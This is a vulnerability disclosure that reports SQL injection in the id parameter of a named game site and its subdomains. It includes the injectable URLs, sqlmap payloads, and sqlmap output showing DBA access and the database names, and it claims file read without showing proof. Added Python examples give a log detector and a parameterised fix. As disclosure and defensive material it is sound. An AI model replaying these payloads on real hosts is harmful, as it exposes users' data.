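2015-10-02: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-11-16: The vendor has actively ignored the vulnerability; details disclosed to the public
SQL injection on the main site, and every second-level game platform is injectable through the same parameter!~~~ (DBA privileges + hundreds of thousands of user records leaked + arbitrary file read)
1. SQL injection on the main site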
http://www.76ju.com/?c=ServiceCenter&action=detail&cid=3&id=25
The id parameter is injectable
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: c=ServiceCenter&action=detail&cid=3&id=25) AND 9148=9148 AND (4098=4098

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: c=ServiceCenter&action=detail&cid=3&id=-3901) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b647671,0x4b4353684b524b734163,0x7163676871),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: c=ServiceCenter&action=detail&cid=3&id=25) AND SLEEP(5) AND (7772=7772
---
[22:58:29] [INFO] testing MySQL
[22:58:29] [INFO] confirming MySQL
[22:58:30] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
[22:58:30] [INFO] fetching current user
current user: '[email protected]'
[22:58:30] [INFO] fetching current database
current database: '76jutest'
[22:58:30] [INFO] testing if current user is DBA
[22:58:30] [INFO] fetching current user
current user is DBA: True
database management system users [8]:
[*] ''@'51.153.175.59.broad.wh.hb.dynamic.163data.com.cn'
[*] ''@'localhost'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.1.100'
[*] 'root'@'27.16.170.223'
[*] 'root'@'51.153.175.59.broad.wh.hb.dynamic.163data.com.cn'
[*] 'root'@'::1'
available databases [10]:
[*] 76ju
[*] 76jutest
[*] information_schema
[*] iy6v1
[*] mysql
[*] performance_schema
[*] qq990
[*] qq990test
[*] qq990test1
[*] test
Hundreds of thousands of records can be retrieved, so I will not go any further; see for yourself!~~~
2. All second-level pages have SQL injection
A partial list:
http://xsg.76ju.com/?action=detail&id=4117
http://jz.76ju.com/?action=detail&id=4043
http://sgyjz.76ju.com/?action=detail&id=4093
http://zlsg.76ju.com/?action=detail&id=4435
http://atxm.76ju.com/?action=detail&id=4292
http://tglz2.76ju.com/?action=detail&id=4404
http://sgh.76ju.com/?action=detail&id=4393
...and so on. Every second-level web game page has this injectable id parameter.
Tested with http://xsg.76ju.com/?action=detail&id=4117
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=detail&id=4117) AND 9720=9720 AND (2548=2548

    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: action=detail&id=-4436) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170616771,0x5864637342657855776c,0x7165746d71),NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=detail&id=4117) AND SLEEP(5) AND (5111=5111
---
[23:03:37] [INFO] testing MySQL
[23:03:37] [INFO] confirming MySQL
[23:03:38] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
[23:03:38] [INFO] fetching current user
current user: '[email protected]'
[23:03:38] [INFO] fetching current database
current database: '76jutest'
[23:03:38] [INFO] fetching server hostname
hostname: '51.153.175.59.broad.wh.hb.dynamic.163data.com.cn'
[23:03:38] [INFO] testing if current user is DBA
[23:03:38] [INFO] fetching current user
current user is DBA: True
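Because the same id parameter is exposed on the main site and on every second-level page, an access-log audit can key on one rule: id and cid must decode to plain integers. The following is an added example, not part of the original report; the log lines are constructed (addresses, times and sizes are invented, the query shapes follow the requests quoted above), and the log layout is assumed to be the common nginx access-log form.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines: addresses, times and sizes are invented;
# the query strings reuse the request shapes quoted in the report.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Oct/2015:22:58:29 +0800] "GET /?c=ServiceCenter&action=detail&cid=3&id=25 HTTP/1.1" 200 5120
203.0.113.9 - - [02/Oct/2015:22:58:30 +0800] "GET /?c=ServiceCenter&action=detail&cid=3&id=25%29%20AND%209148%3D9148%20AND%20%284098%3D4098 HTTP/1.1" 200 5120
203.0.113.9 - - [02/Oct/2015:23:03:37 +0800] "GET /?action=detail&id=4117%29%20AND%20SLEEP%285%29%20AND%20%285111%3D5111 HTTP/1.1" 200 0
203.0.113.9 - - [02/Oct/2015:23:03:38 +0800] "GET /?action=detail&id=-4436%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 HTTP/1.1" 200 312
198.51.100.4 - - [02/Oct/2015:23:04:01 +0800] "GET /?action=detail&id=4043 HTTP/1.1" 200 4800
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Parameters that the pages in the report use as plain integers.
INTEGER_PARAMS = ("id", "cid")
# Coarse labels for triage only; the integer check below is what decides.
SQL_HINT_RE = re.compile(r"\b(union\s+(?:all\s+)?select|sleep\s*\(|and\s+\d+\s*=\s*\d+)", re.I)


def suspicious_requests(log_text):
    """Return (ip, param, decoded_value, label) for integer params that are not integers."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        # parse_qs percent-decodes the values, so encoded payloads are compared in clear.
        params = parse_qs(query, keep_blank_values=True)
        for name in INTEGER_PARAMS:
            for value in params.get(name, []):
                if re.fullmatch(r"[0-9]{1,10}", value):
                    continue
                label = "sql-keywords" if SQL_HINT_RE.search(value) else "non-integer"
                findings.append((match.group("ip"), name, value, label))
    return findings


if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG):
        print(finding)
```

The allow-list check, not the keyword pattern, decides what is reported, so encodings or keywords the pattern does not know still surface as "non-integer".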
3. Arbitrary files can be read (/etc/passwd)
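As above
Filter and fix
Restrict privileges
Do not put all the databases together
Unable to contact the vendor, or the vendor actively declined
Vulnerability Rank: 15 (WooYun rating)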
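The "filter" part of the fix, shown as an added example that is not code from the original report or from the affected site: the same lookup written with string concatenation and then with an integer allow-list plus a bound parameter. The table name news, the function names and the "(id = ...)" query shape are assumptions (the shape is inferred from the closing parenthesis in the payloads above), and an in-memory SQLite database stands in for MySQL.

```python
import sqlite3


def make_db():
    # Constructed in-memory table standing in for the data behind action=detail
    # (hypothetical name and rows).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(25, "Service notice"), (26, "Maintenance")])
    return db


def detail_vulnerable(db, raw_id):
    # Assumed 'before' pattern: the raw request value is pasted into the SQL text,
    # so anything after the digits becomes part of the statement.
    sql = "SELECT id, title FROM news WHERE (id = " + raw_id + ")"
    return db.execute(sql).fetchall()


def detail_hardened(db, raw_id):
    # 1) Allow-list: the parameter must be a short run of ASCII digits.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        raise ValueError("id must be a non-negative integer")
    # 2) Bound parameter: the value travels separately from the SQL text.
    sql = "SELECT id, title FROM news WHERE (id = ?)"
    return db.execute(sql, (int(raw_id),)).fetchall()


def is_rejected(db, raw_id):
    """True when the hardened handler refuses the value before any query runs."""
    try:
        detail_hardened(db, raw_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    reported = "25) AND 9148=9148 AND (4098=4098"   # value quoted in the report
    negated = "25) AND 9148=9149 AND (4098=4098"    # same shape, false condition
    # Different answers for the two values are what make the concatenated
    # query usable as a boolean oracle.
    print(detail_vulnerable(db, reported), detail_vulnerable(db, negated))
    print(is_rejected(db, reported), detail_hardened(db, "25"))
```

Input handling covers only the first item of the fix; the DBA-level account and the shared database server reported above are addressed by the other two items.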